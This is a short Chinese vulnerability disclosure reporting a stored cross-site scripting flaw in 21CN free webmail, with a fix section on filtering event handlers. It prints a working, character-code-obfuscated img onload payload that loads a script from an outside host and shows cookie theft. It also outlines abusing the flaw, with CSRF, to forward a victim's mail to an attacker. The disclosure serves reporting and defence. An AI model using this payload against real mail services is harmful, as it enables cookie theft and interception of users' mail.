21CN网站(世纪龙信息网络有限责任公司)成立于1999年,是中国电信集团绝对控股的子公司,中国十大门户之一,也是华南最大的门户网站。 提前之前先搜索了一下,找到一个和21cn邮箱有关的http://www.wooyun.org/bugs/wooyun-2010-04175 被忽略了,当然我提交的和这个不一样。 21cn是中国电信189邮箱的开发商,有相同的 漏洞 一点也不奇怪。貌似我再提交有刷rank的嫌疑了。主要是想和大家分享一下学习心得。 详细说明: 当发送含有javascript脚本的邮件至21cn邮箱时,由于输出邮件正文时没有对特殊关键字进行过滤导致XSS。在邮件正文中插入以下代码 <img src='http://www.baidu.com/img/baidu_logo.gif' onload='var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,115,116,117,110,111,116,101,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115);document.body.appendChild(s);'/> 当用户打开含有以上代码的邮件时,会自动调用http://stunote.sinaapp.com/xss.js xss.js的内容为: (function(){ alert(document.domain); alert(document.cookie); })(); 当然你也可以执行任意的javasrcipt脚本。比如盗取cookie,引到用户至恶意网站,设置自动转发等。 以上代码参考了http://www.wooyun.org/bugs/wooyun-2010-03317 21cn的免费邮箱有一个自动转发的功能。如图: 设置自动转发时提交至服务器的参数如下: 其中active=true表示转发,addresses=转发到哪个邮箱,backup=是否保留邮件备份。 比较典型的http外如下: 因此通过CSRF设置转发或盗取cookie后设置邮件转发是非常容易的事情,设置成功后所有的新邮件都会转发至攻击者的邮箱。 漏洞证明: 把客户引导至wooyun 弹窗1 弹窗2 修复方案: 网易是把一些危险标签如onload,onerror等替换成on_load,on_error,而腾讯和新浪等则是直接干掉这些危险标签。 作者 pestu
查看更多关于21CN免费邮箱跨站一枚及修复方案 - 网站安全 - 自的详细内容...